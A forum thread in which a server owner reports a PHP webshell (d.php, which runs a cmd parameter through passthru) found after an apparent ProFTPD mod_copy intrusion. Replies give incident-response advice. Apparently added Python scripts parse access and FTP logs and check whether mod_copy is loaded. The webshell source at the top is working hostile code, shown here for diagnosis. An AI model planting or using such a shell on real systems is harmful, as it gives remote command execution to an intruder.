My server has been hacked help

#1 Sun, 07/19/2015 - 12:21
guesthere

My server has been hacked help

Hi everyone, I logged in to my server today and I saw a new file created. I don't know who created this file. Name of file: d.php. Content of file (proftpd):

<?php
 passthru($_GET['cmd']); // runs the attacker-supplied ?cmd= value through the system shell
 echo 'm3rg3';           // fixed marker string so the attacker can confirm the shell responds
?>

and I found a Perl backdoor. Can anyone help me? I'm using Webmin and Ubuntu. I see in the log a lot of attacks from China. Can anyone explain to me what happened?

Sun, 07/19/2015 - 22:27
andreychek

Howdy,

Yeah, unfortunately, that kind of thing can happen. It's likely that the attacker broke in through a vulnerability in a web app, or maybe they guessed one of the passwords for an account in your web app.

First, you'll want to look around and find any files that don't belong there.

You can then look at their timestamps, and match that to activity in the Apache access log for that domain.

That may help you identify how they broke in.

You'd definitely want to make sure your web app is fully up to date, along with any plugins it's running.

-Eric
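
The timestamp-to-access-log correlation Eric describes, as an added example that is not part of the original thread: take the mtime of the suspicious file, pull every Apache combined-format request within a window around it, and list every request that hit the webshell itself. The file path, mtime, client IPs and all access-log lines below are constructed for illustration; only the filename d.php comes from the post.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed Apache combined-log lines (not from the thread); IPs are documentation ranges.
ACCESS_LOG = """\
203.0.113.7 - - [19/Jul/2015:00:40:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
198.51.100.9 - - [19/Jul/2015:00:44:10 +0000] "GET /d.php?cmd=id HTTP/1.1" 200 71 "-" "python-requests/2.7.0"
198.51.100.9 - - [19/Jul/2015:00:44:12 +0000] "GET /d.php?cmd=uname%20-a HTTP/1.1" 200 140 "-" "python-requests/2.7.0"
203.0.113.7 - - [19/Jul/2015:09:12:44 +0000] "GET /index.html HTTP/1.1" 304 - "-" "Mozilla/5.0"
"""

# Hypothetical `stat` result for the dropped file: path and mtime are assumptions.
SUSPECT_FILES = {
    "/var/www/html/d.php": datetime(2015, 7, 19, 0, 43, 55, tzinfo=timezone.utc),
}

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_access_log(text):
    """Parse combined-format lines into dicts with a timezone-aware datetime."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        entries.append({**m.groupdict(), "ts": ts})
    return entries


def requests_near(entries, when, window=timedelta(minutes=5)):
    """Requests within +/- window of the file's mtime: candidates for the drop itself."""
    return [e for e in entries if abs(e["ts"] - when) <= window]


def webshell_hits(entries, filename):
    """Requests whose path (query string stripped) is the dropped file."""
    base = filename.rsplit("/", 1)[-1]
    return [e for e in entries if e["path"].split("?")[0].endswith("/" + base)]


def triage(log_text, suspects):
    """For each suspicious file, gather nearby requests, webshell hits and the IPs using it."""
    entries = parse_access_log(log_text)
    report = {}
    for path, mtime in suspects.items():
        hits = webshell_hits(entries, path)
        report[path] = {
            "near": requests_near(entries, mtime),
            "hits": hits,
            "source_ips": sorted({e["ip"] for e in hits}),
        }
    return report


if __name__ == "__main__":
    for path, r in triage(ACCESS_LOG, SUSPECT_FILES).items():
        print(f"{path}: {len(r['near'])} requests near mtime, "
              f"{len(r['hits'])} webshell hits from {r['source_ips']}")
        for e in r["hits"]:
            print("  ", e["ts"].isoformat(), e["ip"], e["path"], e["ua"])
```

The "near" list answers how the file got there (what was requested just before the mtime); the "hits" list answers what the attacker did with it afterwards, and its IPs are what you take to the firewall and the rest of the logs.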

Mon, 07/20/2015 - 00:42
tpnsolutions

Hi,

Drop me a line on Skype tomorrow (Monday) and I'll see what I can do to help you.

Best Regards,
Peter Knowles
TPN Solutions

Email: pknowles@tpnsolutions.com
Phone: 604-782-9342
Skype: tpnsupport
Website: http://www.tpnsolutions.com

Mon, 07/20/2015 - 06:57
guesthere

Hi, thanks for the reply. I know, but I'm not using any web app, and I think I found the exploit: it's a ProFTPD exploit, ProFTPd 1.3.5 - File Copy - Exploits http://bugs.proftpd.org/show_bug.cgi?id=4169. Actually, I disabled proftpd.

Last proftpd log:

2015-07-19 00:38:22,950 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): FTP session opened.
2015-07-19 00:38:23,441 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): USER ftpuser: no such user found from 59.38.97.174 [59.38.97.174] to ::ffff:213.136.72.38:21
2015-07-19 00:43:22,643 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): Login timeout exceeded, disconnected
2015-07-19 00:43:22,685 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): Session timed out, disconnected
2015-07-19 00:43:22,688 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): FTP session closed.
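
The log lines in the post are in ProFTPD's default syslog-style format, which records session open/close and login results but not individual commands (SITE CPFR/CPTO from the mod_copy bug would only show up in an ExtendedLog). What can still be pulled from it is a per-session summary: which remote IP connected, whether it ever authenticated, how many logins failed, and how long it sat on the socket. The following parser is an added example, not code from the thread or from ProFTPD; it runs over the five lines posted above and groups them by the daemon child pid, which ProFTPD prints once per connection.

```python
import re
from collections import defaultdict
from datetime import datetime

# The five lines from the post above, verbatim.
PROFTPD_LOG = """\
2015-07-19 00:38:22,950 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): FTP session opened.
2015-07-19 00:38:23,441 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): USER ftpuser: no such user found from 59.38.97.174 [59.38.97.174] to ::ffff:213.136.72.38:21
2015-07-19 00:43:22,643 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): Login timeout exceeded, disconnected
2015-07-19 00:43:22,685 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): Session timed out, disconnected
2015-07-19 00:43:22,688 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): FTP session closed.
"""

# "<date> <time>,<ms> <host> proftpd[<pid>] <host> (<rhost>[<rip>]): <message>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}),\d{3} \S+ proftpd\[(?P<pid>\d+)\] \S+ "
    r"\((?P<rhost>[^\[]*)\[(?P<rip>[^\]]+)\]\): (?P<msg>.*)$"
)


def parse(text):
    """Yield one dict per parseable line; milliseconds are dropped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield {**m.groupdict(), "ts": datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")}


def sessions(text):
    """Group events by child pid. Note: pids recycle over long log spans, so a
    production version should start a new record on every 'FTP session opened'."""
    by_pid = defaultdict(lambda: {"ip": None, "opened": None, "closed": None,
                                  "failed": 0, "logged_in": False, "events": []})
    for e in parse(text):
        s = by_pid[e["pid"]]
        s["ip"] = e["rip"]
        msg = e["msg"]
        s["events"].append(msg)
        if msg.startswith("FTP session opened"):
            s["opened"] = e["ts"]
        elif msg.startswith("FTP session closed"):
            s["closed"] = e["ts"]
        elif msg.startswith("USER ") and ("no such user" in msg or "Login failed" in msg):
            s["failed"] += 1
        elif msg.startswith("USER ") and "Login successful" in msg:
            s["logged_in"] = True
    return dict(by_pid)


def suspicious(text):
    """Sessions that never authenticated: failed guesses, scanners, or pre-auth exploitation."""
    out = []
    for pid, s in sessions(text).items():
        if s["opened"] and s["closed"] and not s["logged_in"]:
            out.append({"pid": pid, "ip": s["ip"], "failed_logins": s["failed"],
                        "seconds": (s["closed"] - s["opened"]).total_seconds()})
    return out


def failed_logins_by_ip(text):
    """Aggregate failed USER attempts per remote IP across all sessions."""
    counts = defaultdict(int)
    for s in sessions(text).values():
        counts[s["ip"]] += s["failed"]
    return dict(counts)


if __name__ == "__main__":
    for s in suspicious(PROFTPD_LOG):
        print(f"pid {s['pid']} from {s['ip']}: {s['failed_logins']} failed login(s), "
              f"open {s['seconds']:.0f}s without authenticating")
```

On the posted lines this reports a single unauthenticated session from 59.38.97.174 with one failed login that stayed open for 300 seconds until the login timeout. That is consistent with a scanner, but it does not prove or disprove a mod_copy hit: a CPFR/CPTO session would look identical here, because the commands themselves are not in this log.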

Mon, 07/20/2015 - 11:06
andreychek

Howdy,

It sounds like you disabled ProFTPd -- that's good. If you think that's the issue, you may want to make sure that mod_copy is disabled in ProFTPd.

What distro/version is it that you're using there though?

-Eric
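
A way to check the "make sure mod_copy is disabled" advice against the actual configuration, as an added example that is not from the thread or from the ProFTPD project. It assumes the Debian/Ubuntu layout in which /etc/proftpd/modules.conf loads modules with `LoadModule mod_copy.c` lines, and it treats a `<Limit SITE_CPFR SITE_CPTO>` block containing `DenyAll` in proftpd.conf as the fallback mitigation when the module must stay loaded. Both config excerpts below are constructed: one with the weak setting, one corrected.

```python
import re

# Constructed excerpt of a modules.conf that still loads mod_copy (weak setting).
WEAK_MODULES_CONF = """\
ModulePath /usr/lib/proftpd
ModuleControlsACLs insmod,rmmod allow user root
LoadModule mod_ctrls_admin.c
LoadModule mod_copy.c
"""

# Same file with the module commented out (corrected setting).
HARDENED_MODULES_CONF = """\
ModulePath /usr/lib/proftpd
ModuleControlsACLs insmod,rmmod allow user root
LoadModule mod_ctrls_admin.c
# LoadModule mod_copy.c
"""

# Constructed proftpd.conf fragment denying the two SITE commands mod_copy adds.
HARDENED_PROFTPD_CONF = """\
<Limit SITE_CPFR SITE_CPTO>
  DenyAll
</Limit>
"""

# An active (uncommented) LoadModule line for mod_copy.
LOAD_RE = re.compile(r"^\s*LoadModule\s+mod_copy\.c\s*$", re.M)
# Any <Limit ...> ... </Limit> block, capturing the command list and the body.
LIMIT_RE = re.compile(r"<Limit\s+([^>]*)>(.*?)</Limit>", re.S | re.I)


def mod_copy_loaded(modules_conf):
    """True if modules.conf has an uncommented LoadModule mod_copy.c line."""
    return bool(LOAD_RE.search(modules_conf))


def site_copy_denied(proftpd_conf):
    """True if some <Limit> block covers both SITE_CPFR and SITE_CPTO and contains DenyAll."""
    for names, body in LIMIT_RE.findall(proftpd_conf):
        cmds = {n.upper() for n in names.split()}
        if {"SITE_CPFR", "SITE_CPTO"} <= cmds and re.search(r"^\s*DenyAll\s*$", body, re.M):
            return True
    return False


def assess(modules_conf, proftpd_conf):
    """One-line verdict; a loaded module with no Limit block is the exposed state."""
    if not mod_copy_loaded(modules_conf):
        return "ok: mod_copy not loaded"
    if site_copy_denied(proftpd_conf):
        return "ok: mod_copy loaded but SITE CPFR/CPTO denied"
    return "VULNERABLE: mod_copy loaded and SITE CPFR/CPTO not limited"


if __name__ == "__main__":
    # On a real host read the files instead of the constructed strings, e.g.
    # open("/etc/proftpd/modules.conf").read() and open("/etc/proftpd/proftpd.conf").read()
    print("weak:     ", assess(WEAK_MODULES_CONF, ""))
    print("limited:  ", assess(WEAK_MODULES_CONF, HARDENED_PROFTPD_CONF))
    print("unloaded: ", assess(HARDENED_MODULES_CONF, ""))
```

Whichever fix is applied, proftpd has to be restarted for it to take effect, and the check above only reads the files: it cannot tell you what the running daemon has loaded, and it does not follow `Include` directives, so run it against every file that ends up in the effective configuration.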

Mon, 07/20/2015 - 11:22
guesthere

Operating system: Ubuntu Linux 13.10
Webmin version: 1.760

Mon, 07/20/2015 - 12:04
andreychek

Ah, Ubuntu 13.10 reached its end of life over a year ago. So it's no longer receiving any updates, including security updates.

There are likely a number of vulnerabilities on your server now.

We'd highly recommend upgrading to a current distribution.

When using Ubuntu, we recommend the Ubuntu LTS releases, as they're supported for 5 years.

-Eric
